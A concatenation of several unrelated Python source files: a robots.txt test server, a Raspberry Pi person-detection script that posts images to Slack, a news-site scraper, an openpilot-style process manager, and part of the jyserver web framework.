# Years are only 2 digits in RFC 850.
year = int(str(a_datetime.year)[2:])
return RFC850_FORMAT.format(weekday, a_datetime.day, month, year, a_datetime.hour,
a_datetime.minute, a_datetime.second)
def format_as_asctime(a_datetime):
"""Given a UTC datetime.datetime instance, return it formatted in C's asctime() format.
e.g. - Sun Nov 6 08:49:37 1994
"""
# Per Python's documentation, "Locale information is not used by asctime()" which saves me
# some work.
return time.asctime(a_datetime.timetuple())
class UTCTimezone(datetime.tzinfo):
"""The UTC timezone, because Python 2 doesn't provide one. Replaced by datetime.timezone.utc
in Python 3.
"""
def utcoffset(self, dt):
return datetime.timedelta(0)
def dst(self, dt):
return datetime.timedelta(0)
def get_utc_timezone():
"""Return appropriate UTC timezone based on Python version"""
return UTCTimezone() if (PY_MAJOR_VERSION < 3) else datetime.timezone.utc
class MyHTTPRequestHandler(BaseHTTPRequestHandler):
"""Handler for HTTP requests from the test code.
If you are new to Python and tempted to use this code to handle requests from the public
Internet, stop! It's fine for internal-use test code but full of assumptions that would
break and/or be dangerous on the public Internet.
"""
def do_GET(self):
"""Handle GET requests that start with one of the path prefixes that I expect."""
if self.path.startswith('/encoding/'):
self._handle_encoding_request()
elif self.path.startswith('/response_code/'):
self._handle_response_code_request()
elif self.path.startswith('/sleep/'):
self._handle_sleep_request()
elif self.path.startswith('/expires/'):
self._handle_expires_request()
elif self.path.startswith('/die_die_die/'):
# It's time to quit. This uses code from here:
# http://stackoverflow.com/questions/10085996/shutdown-socketserver-serve-forver-in-one-thread-python-application/22533929#22533929
kill_server = lambda server: server.shutdown()
kill_thread = threading.Thread(target=kill_server, args=(self.server,))
kill_thread.start()
self.send_response(200)
self.end_headers()
def log_request(self, code='-', size='-'):
"""Override base class log_request() to silence chatter to console"""
pass
def _handle_encoding_request(self):
"""Return robots.txt content in a specific encoding.
The path must be something like '/encoding/utf-8/robots.txt' where the encoding can vary.
"""
path_elements = self.path.split('/')
encoding = path_elements[2]
# Read content from standard data file which is encoded as utf-8.
filename = os.path.join(os.path.dirname(__file__), 'robots.txt')
with open(filename) as f:
content = f.read().decode('utf-8')
self.send_response(200)
self.send_header('Content-Type', 'text/plain; charset={}'.format(encoding))
self.end_headers()
self.wfile.write(content)
def _handle_response_code_request(self):
"""Respond with a specific response code (e.g. 200, 404, etc.)
The path must be something like '/response_code/777/robots.txt' where the code can vary.
"""
path_elements = self.path.split('/')
response_code = int(path_elements[2])
self.send_response(response_code)
self.end_headers()
def _handle_sleep_request(self):
"""Sleep (wait) for a specific amount of time before responding with 200.
The path must be something like '/sleep/2/robots.txt' where the sleep time can vary. The
sleep time can be a float.
"""
path_elements = self.path.split('/')
sleep_time = float(path_elements[2])
time.sleep(sleep_time)
self.send_response(200)
self.end_headers()
def _handle_expires_request(self):
"""Respond with 200 and includes an Expires header.
The Expires header will use the date and format encoded in the path. The path must be
something like '/expires/2015-12-15-01-01-01/rfc1123/robots.txt' where the timestamp and
format can vary.
The timestamp is in ISO order but delimited with '-' to make it URL-friendly.
The format can be one of the 3 specified in the HTTP 1.1 spec: 'rfc1123', 'rfc850', or
'asctime'.
"""
path_elements = self.path.split('/')
# expiration_date is in ISO format ordering, but with all elements delimited by dashes.
expiration_date = path_elements[2]
rfc_format = path_elements[3]
expiration_date = datetime.datetime.strptime(expiration_date, '%Y-%m-%d-%H-%M-%S')
# Make it a UTC time.
expiration_date = expiration_date.replace(tzinfo=get_utc_timezone())
if rfc_format == 'rfc1123':
expiration_date = format_as_rfc1123(calendar.timegm(expiration_date.timetuple()))
elif rfc_format == 'rfc850':
expiration_date = format_as_rfc850(expiration_date)
elif rfc_format == 'asctime':
expiration_date = format_as_asctime(expiration_date)
self.send_response(200)
self.send_header('Expires', expiration_date)
self.end_headers()
|
main_detection.py
|
from tflite_runtime.interpreter import Interpreter
from slacker import Slacker
import picamera
import numpy as np
import cv2
import io
import time
import datetime
import threading
def wait_input():
global key_flag
input()
key_flag = False
def set_interpreter(interpreter):
interpreter.set_num_threads(4)
interpreter.allocate_tensors()
def set_input_tensor(interpreter, image):
tensor_index = interpreter.get_input_details()[0]['index']
input_tensor = interpreter.tensor(tensor_index)()[0]
input_tensor[:, :] = image
def get_output_tensor(interpreter, index):
output_details = interpreter.get_output_details()[index]
tensor = np.squeeze(interpreter.get_tensor(output_details['index']))
return tensor
#物体検出の推論
def detect_objects(interpreter, image):
detect_flag = False
set_input_tensor(interpreter, image)
interpreter.invoke()
detect_flag = False
scores_array = []
boxes = get_output_tensor(interpreter, 0)
classes = get_output_tensor(interpreter, 1)
scores = get_output_tensor(interpreter, 2)
count = int(get_output_tensor(interpreter, 3))
for i in range(count):
if scores[i] >= 0.5 and classes[i] == 0:
scores_array.append(scores[i])
if scores_array:
max_score = scores_array.index(max(scores_array))
target_box = boxes[max_score]
detect_flag = True
else:
target_box = []
detect_flag = False
return detect_flag, target_box
def person_position(result, width):
_, xmin, _, xmax = result
after_xmin = int(xmin * width) if int(xmin * width) >= 0 else 0
after_xmax = int(xmax * width) if int(xmax * width) >= 0 else 0
return after_xmin, after_xmax
def get_center_line(left, right):
return (left + right) // 2
def image_cap(width, height, count):
camera.resolution = (width, height)
filepath = "image/" + str(count) + ".jpg"
camera.capture(filepath)
camera.resolution = (480, 270)
return filepath
#slackへの画像アップロード,Hubotを使用
def upload_image(file):
#各自のワークスペースのAPIトークン
token = 'api-token'
#任意のチャンネル
channel = 'channel'
upload_file = file
slacker = Slacker(token)
slacker.files.upload(file_=upload_file, channels=channel)
if __name__ == '__main__':
interpreter = Interpreter("model/mobilenet_ssd_v2_coco_quant_postprocess.tflite")
set_interpreter(interpreter)
with picamera.PiCamera() as camera:
image_width, image_height = 480,270
camera.resolution = (image_width, image_height)
camera.framerate = 15
camera.shutter_speed = 30000
camera.iso = 800
stream = io.BytesIO()
key_flag = True
person_detect_flag = False
push_count = 0
filepath_array = []
th = threading.Thread(target=wait_input)
th.start()
while key_flag:
camera.capture(stream, format='jpeg', use_video_port=True)
frame = np.frombuffer(stream.getvalue(), dtype=np.uint8)
getimage = cv2.imdecode(frame, 1)
inputimage = cv2.resize(getimage, (300, 300))
result_flag, result_box = detect_objects(interpreter, inputimage)
if result_flag:
left_line, right_line = person_position(result_box, image_width)
center_line = get_center_line(left_line, right_line)
#cv2.line(getimage, (left_line,0), (left_line,image_height), (0, 255, 0), 2)
#cv2.line(getimage, (right_line,0), (right_line,image_height), (0, 255, 0), 2)
#cv2.line(getimage, (center_line,0), (center_line,image_height), (255, 0, 0), 2)
print(left_line, right_line, center_line)
if not person_detect_flag:
save_left_line, save_right_line = left_line, right_line
person_detect_flag = True
else:
pass
#cv2.line(getimage, (save_left_line,0), (save_left_line,image_height), (0, 0, 255), 2)
#cv2.line(getimage, (save_right_line,0), (save_right_line,image_height), (0, 0, 255), 2)
if not save_left_line < center_line < save_right_line:
push_count += 1
print(push_count)
file_path = image_cap(1920, 1080, push_count)
filepath_array.append(file_path)
person_detect_flag = False
else:
print('Not detection')
#cv2.imshow('image', getimage)
#cv2.waitKey(1)
stream.truncate()
stream.seek(0)
th.join()
#cv2.destroyAllWindows()
for file in filepath_array:
upload_image(file)
|
test_logserver.py
|
#from resc.resclog.logserver.server import start_server
#from multiprocessing import Process
#import time
#import requests
#import pytest
#import asyncio
#
#_IP="http://localhost:55555"
#class TestServer:
# def setup_server(self):
# self.process = Process(target=start_server,daemon=True)
# self.process.start()
# def terminate_server(self):
# self.process.kill()
#
#@pytest.fixture(scope="module",autouse=True)
#def setup_server():
# server = TestServer()
# server.setup_server()
# time.sleep(5)
# yield server
# server.terminate_server()
#
#def test_index(setup_server):
# pass
# server = setup_server
#
# response = requests.get(_IP,timeout=30)
# assert response is not None
# assert isinstance(response.status_code,int)
# assert response.status_code == 200
# assert isinstance(response.content,bytes)
# assert len(response.content)>0
#
# print(response.content)
|
scraper3.py
|
import timeit
import threading
import requests
from bs4 import BeautifulSoup
from news.models import News
# checking if that news link exists on database
def checkIfExist(newsLink):
numOfNews = News.objects.filter(newslink=newsLink).count()
return numOfNews
# Main news page to bring more news
def mainNewsPage(url):
res = requests.get(url)
return BeautifulSoup(res.text, 'html.parser')
# collect news links
def collectLinks(soup, findClass, name):
listOfLink = []
for findLink in soup.find_all(findClass):
link = findLink.get('href')
if len(str(link)) >= 45 and name.lower() in link:
listOfLink.append(link)
links = list(dict.fromkeys(listOfLink)) # remove same link
links.reverse()
return links
# save to database
def saveToDB(head, imageLink, newsLink, desc, name):
if desc != '' and len(head) < 90:
news = News(heading=head, imagelink=imageLink,
newslink=newsLink, details=desc, papername=name)
news.save()
print(head)
# web scraping Jugantor
def jugantor():
name = 'Jugantor'
url = 'https://www.jugantor.com/all-news'
findClass = 'a', {'class': 'text-decoration-none'}
soup = mainNewsPage(url)
links = collectLinks(soup, findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('h3', {'class': 'font-weight-bolder'})
head = headdiv.getText()
imagediv = soup.find(
'img', {'class': 'figure-img img-fluid rounded-0'})
imageLink = imagediv.get('src')
desc = ''
for i in soup.find_all('div',
{'class': 'IfTxty news-element-text text-justify my-2 pr-md-4 text-break'}):
desc = i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# web scraping Samakal
def samakal():
name = 'Samakal'
url = 'https://samakal.com/list/all'
findClass = 'a', {'class': 'link-overlay'}
links = collectLinks(mainNewsPage(url), findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('h1', {'class': 'detail-headline'})
head = headdiv.getText()
imagediv = soup.find('div', {'class': 'lightgallery'})
image = imagediv.find('img', {'class': 'img-responsive'})
imageLink = image.get('src')
desc = ''
body = soup.find('div', {'class': 'description'})
for i in body.find_all('span'):
desc += i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# web scraping Ittefaq
def ittefaq():
name = 'Ittefaq'
url = 'https://www.ittefaq.com.bd/all-news'
findClass = 'a', {'class': None}
links = collectLinks(mainNewsPage(url), findClass, name)
while len(links) > 0:
newsLink = links.pop()
try:
if checkIfExist(newsLink) == 0:
news_url = requests.get(newsLink)
soup = BeautifulSoup(news_url.text, 'html.parser')
headdiv = soup.find('div', {'id': 'dtl_hl_block'})
head = headdiv.getText()
imagediv = soup.find('div', {'id': 'dtl_img_block'})
image = imagediv.find('img')
imageLink = "https://www.ittefaq.com.bd" + image.get('src')
desc = ''
body = soup.find('div', {'id': 'dtl_content_block'})
for i in body.find_all('p'):
desc += i.getText().replace("\n", "")
saveToDB(head, imageLink, newsLink, desc, name)
else:
break
except Exception:
continue
# Start scraping
def Scrape():
start = timeit.default_timer()
print("______________Initialized Scrape_________________")
p1 = threading.Thread(target=jugantor())
p2 = threading.Thread(target=samakal())
p3 = threading.Thread(target=ittefaq())
p1.start()
p2.start()
p3.start()
stop = timeit.default_timer()
print('Time: ', stop - start)
|
manager.py
|
#!/usr/bin/env python3
import datetime
import importlib
import os
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import textwrap
import time
import traceback
from multiprocessing import Process
from typing import Dict
from common.basedir import BASEDIR
from common.spinner import Spinner
from common.text_window import TextWindow
import selfdrive.crash as crash
from selfdrive.hardware import HARDWARE, EON, PC, TICI
from selfdrive.hardware.eon.apk import update_apks, pm_apply_packages, start_offroad
from selfdrive.swaglog import cloudlog, add_logentries_handler
from selfdrive.version import version, dirty
os.environ['BASEDIR'] = BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
TOTAL_SCONS_NODES = 1040
MAX_BUILD_PROGRESS = 70
WEBCAM = os.getenv("WEBCAM") is not None
PREBUILT = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16 bit value
# whose low byte is the signal number and whose high byte is the exit satus
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
# Start spinner
spinner = Spinner()
spinner.update_progress(0, 100)
if __name__ != "__main__":
spinner.close()
def build():
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else f"-j{nproc - 1}"
for retry in [True, False]:
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
spinner.update_progress(MAX_BUILD_PROGRESS * min(1., i / TOTAL_SCONS_NODES), 100.)
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry and (not dirty):
if not os.getenv("CI"):
print("scons build failed, cleaning in")
for i in range(3, -1, -1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache", ignore_errors=True)
shutil.rmtree("/data/scons_cache", ignore_errors=True)
else:
print("scons build failed after retry")
sys.exit(1)
else:
# Build failed log errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
spinner.close()
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
exit(1)
else:
break
if __name__ == "__main__" and not PREBUILT:
build()
import cereal.messaging as messaging
from cereal import log
from common.params import Params
from selfdrive.registration import register
from selfdrive.launcher import launcher
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.monitoring.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": "selfdrive.locationd.paramsd",
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"rtshield": "selfdrive.rtshield",
"interbridged": "selfdrive.interbridge.interbridged",
"livedashserverd": "livedash.served",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running: Dict[str, Process] = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGKILL instead of SIGTERM
kill_processes = []
if EON:
kill_processes += [
'sensord',
]
persistent_processes = [
'pandad',
'thermald',
'logmessaged',
'ui',
'uploader',
'deleter',
'interbridged',
"livedashserverd",
]
if not PC:
persistent_processes += [
'updated',
'tombstoned',
]
if EON:
persistent_processes += [
'sensord',
]
if TICI:
managed_processes["timezoned"] = "selfdrive.timezoned"
persistent_processes += ['timezoned']
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'locationd',
'clocksd',
'logcatd',
]
driver_view_processes = [
'camerad',
'dmonitoringd',
'dmonitoringmodeld'
]
if not PC or WEBCAM:
car_started_processes += [
'ubloxd',
'dmonitoringd',
'dmonitoringmodeld',
]
if EON:
car_started_processes += [
'rtshield',
]
else:
car_started_processes += [
'sensord',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p, build=False):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "SConscript")) and build:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["scons", "u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# clean and retry if the build failed
cloudlog.warning("building %s failed, cleaning and retrying" % (proc, ))
subprocess.check_call(["scons", "-u", "-c", "."], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["scons", "-u", "-j4", "."], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name, retry=True):
if name not in running or name not in managed_processes:
return
cloudlog.info(f"killing {name}")
if running[name].exitcode is None:
sig = signal.SIGKILL if name in kill_processes else signal.SIGINT
os.kill(running[name].pid, sig)
join_process(running[name], 5)
if running[name].exitcode is None:
if not retry:
raise Exception(f"{name} failed to die")
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("unkillable process %s failed to die!" % name)
os.system("date >> /data/unkillable_reboot")
os.sync()
HARDWARE.reboot()
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
ret = running[name].exitcode
cloudlog.info(f"{name} is dead with {ret}")
del running[name]
return ret
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if EON:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
def send_managed_process_signal(name, sig):
if name not in running or name not in managed_processes or \
running[name].exitcode is not None:
return
cloudlog.info(f"sending signal {sig} to {name}")
os.kill(running[name].pid, sig)
# ****************** run loop ******************
def manager_init():
os.umask(0) # Make sure we can create files with 777 permissions
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
# set dongle id
reg_res = register(spinner)
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
os.environ['DONGLE_ID'] = dongle_id
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty,
device=HARDWARE.get_device_type())
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, device=HARDWARE.get_device_type())
# ensure shared libraries are readable by apks
if EON:
os.chmod(BASEDIR, 0o755)
os.chmod("/dev/shm", 0o777)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
subprocess.call("./bootlog", cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
# start daemon processes
for p in daemon_processes:
start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if EON:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is not None:
del managed_processes["pandad"]
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
started_prev = False
logger_dead = False
params = Params()
thermal_sock = messaging.sub_sock('thermal')
pm = messaging.PubMaster(['managerState'])
while 1:
msg = messaging.recv_sock(thermal_sock, wait=True)
if msg.thermal.freeSpacePercent < 0.05:
logger_dead = True
if msg.thermal.started:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
driver_view = params.get("IsDriverViewEnabled") == b"1"
# TODO: refactor how manager manages processes
for p in reversed(car_started_processes):
if p not in driver_view_processes or not driver_view:
kill_managed_process(p)
for p in driver_view_processes:
if driver_view:
start_managed_process(p)
else:
kill_managed_process(p)
# trigger an update after going offroad
if started_prev:
os.sync()
send_managed_process_signal("updated", signal.SIGHUP)
started_prev = msg.thermal.started
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# send managerState
states = []
for p in managed_processes:
state = log.ManagerState.ProcessState.new_message()
state.name = p
if p in running:
state.running = running[p].is_alive()
state.pid = running[p].pid
state.exitCode = running[p].exitcode or 0
states.append(state)
msg = messaging.new_message('managerState')
msg.managerState.processes = states
pm.send('managerState', msg)
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
def manager_prepare():
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
total = 100.0 - (0 if PREBUILT else MAX_BUILD_PROGRESS)
for i, p in enumerate(managed_processes):
perc = (100.0 - total) + total * (i + 1) / len(managed_processes)
spinner.update_progress(perc, 100.)
prepare_managed_process(p)
def main():
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this dashcam?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if EON:
update_apks()
manager_init()
manager_prepare()
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
cloudlog.warning("uninstalling")
HARDWARE.uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(-3)
error = "Manager failed to start\n\n" + error
spinner.close()
with TextWindow(error) as t:
t.wait_for_exit()
raise
# manual exit because we are forked
sys.exit(0)
|
Server.py
|
'''
Module for using jyserver standalone. This module uses the built-in
http.server module. It serves as a framework for integration into
other servers.
Example
-------------
```python
from jserver import Client, Server
class App(Client):
def __init__(self):
self.html = """
<p id="time">TIME</p>
<button id="reset"
onclick="server.reset()">Reset</button>
"""
def reset(self):
self.start0 = time.time()
self.js.dom.time.innerHTML = "{:.1f}".format(0)
def main(self):
self.start0 = time.time()
while True:
t = "{:.1f}".format(time.time() - self.start0)
self.js.dom.time.innerHTML = t
time.sleep(0.1)
httpd = Server(App)
print("serving at port", httpd.port)
httpd.start()
```
'''
from socketserver import ThreadingTCPServer
from http.server import SimpleHTTPRequestHandler
from http.cookies import SimpleCookie
from urllib.parse import urlparse, parse_qsl, unquote
from jyserver import ClientContext
import json
import threading
import queue
import os
import copy
import re
import time
import uuid
class Client:
'''
Client class contains all methods and code that is executed on the server
and browser. Users of this library should inherit this class and implement
methods. There are three types of methods:
Attributes
------------
home
Optional filename to send when "/" is requested
html
Optional HTML to send when "/" is requested. If neither
`home` nor `html` are set, then it will send "index.html"
js
JS object for constructing and executing Javascript.
Methods
-----------
h(file, html)
Return appropriate HTML for the active page. Can only
be called once per page. Must be called if implementing
custom pages.
Optional Methods
------------
* main(self)
If this is implemented, then the server will begin execution of this
function immediately. The server will terminate when this function
terminates.
* index(self)
If `index` is defined, it will execute this function. The function
is responsible for returning the HTML with the h() method.
* page(self)
When the browser clicks on a link (or issues a GET) a method with the
name of the page is executed. For example, clicking on link "http:/pg1"
will cause a method named "pg1" to be executed.
* func(self)
When the browser executes a "server" command, the server runs a method
with the same name. For example, if the browser runs the Javascript
code:
server.addnum(15, 65)
then this method will be called:
def func(self, 15, 65)
'''
def __init__(self):
self.js = None
self._state = None
def h(self, html=None, file=None):
'''
Convert text to html and wrap with script code. Return the HTML as a
byte string. Must be called if implementing a custom page
such as `index`.
'''
return self._state.htmlsend(html, file)
class Server(ThreadingTCPServer):
'''
Server implements the web server, waits for connections and processes
commands. Each browser request is handled in its own thread and so requests
are asynchronous. The server starts listening when the "start()" method is
called.
Methods
------------
start(wait, cookies)
'''
PORT = 8080
allow_reuse_address = True
def __init__(self, appClass, port=PORT, ip=None, verbose=False):
'''
Parameters
-------------
appClass
Class that inherits Client. Note that this is the
class name and not an instance.
port
Port to listen to (default is PORT)
ip
IP address to bind (default is all)
'''
self.verbose = verbose
# Instantiate objects of this class; must inherit from Client
self.appClass = appClass
self.contextMap = {}
# The port number
self.port = port
if ip is None:
ip = '127.0.0.1'
# Create the server object. Must call start() to begin listening.
super(Server, self).__init__((ip, port), Handler)
# def getContext(self):
# return self._getContextForPage('SINGLE')
def js(self):
'''
If you are implementing a single application without a "main"
function, you can call this to retrieve the JS object and set
up for single instance execution.
'''
return self._getContextForPage('SINGLE', True).getJS()
def _getContextForPage(self, uid, create = False):
c = ClientContext._getContextForPage(uid, self.appClass, create=create, verbose=self.verbose)
return c
def stop(self):
# self._BaseServer__shutdown_request = True
self._runmode = False
# self.shutdown()
def _runServer(self):
'''
Begin running the server until terminated.
'''
self._runmode = True
while self._runmode:
self.handle_request()
# self.serve_forever()
self.log_message("SERVER TERMINATED")
def start(self, wait=True, cookies=True):
'''
Start listening to the port and processing requests.
Parameters
------------
wait
Start listening and wait for server to terminate. If this
is false, start server on new thread and continue execution.
cookies
If True, try to use cookies to keep track of sessions. This
enables the browser to open multiple windows that all share
the same Client object. If False, then cookies are disabled
and each tab will be it's own session.
'''
self.useCookies = cookies
if wait or hasattr(self.appClass, "main"):
self._runServer()
else:
server_thread = threading.Thread(target=self._runServer, daemon=True)
server_thread.start()
def log_message(self, format, *args):
if self.verbose:
print(format % args)
def log_error(self, format, *args):
print(format % args)
class Handler(SimpleHTTPRequestHandler):
'''
Handler is created for each request by the Server. This class
handles the page requests and delegates tasks.
'''
def getContext(self):
return self.server._getContextForPage(self.uid)
def reply(self, data, num=200):
'''
Reply to the client with the given status code. If data is given as a string
it will be encoded at utf8. Cookies are sent if they are used.
'''
self.send_response(num)
if self.server.useCookies:
self.send_header(
"Set-Cookie", self.cookies.output(header='', sep=''))
self.end_headers()
if data is None:
return
if isinstance(data, str):
data = data.encode("utf8")
try:
self.wfile.write(data)
self.log_message("REPLY DONE")
except Exception as ex:
traceback.print_exc()
self.server.log_error("Error sending: %s", str(ex))
def replyFile(self, path, num=200):
'''
Reply to client with given file.
'''
with open(path, "rb") as f:
block = f.read()
result = HtmlPage(block).html(self.uid)
self.reply(result)
def processCookies(self):
'''
Read in cookies and extract the session id.
'''
if self.server.useCookies:
self.cookies = SimpleCookie(self.headers.get('Cookie'))
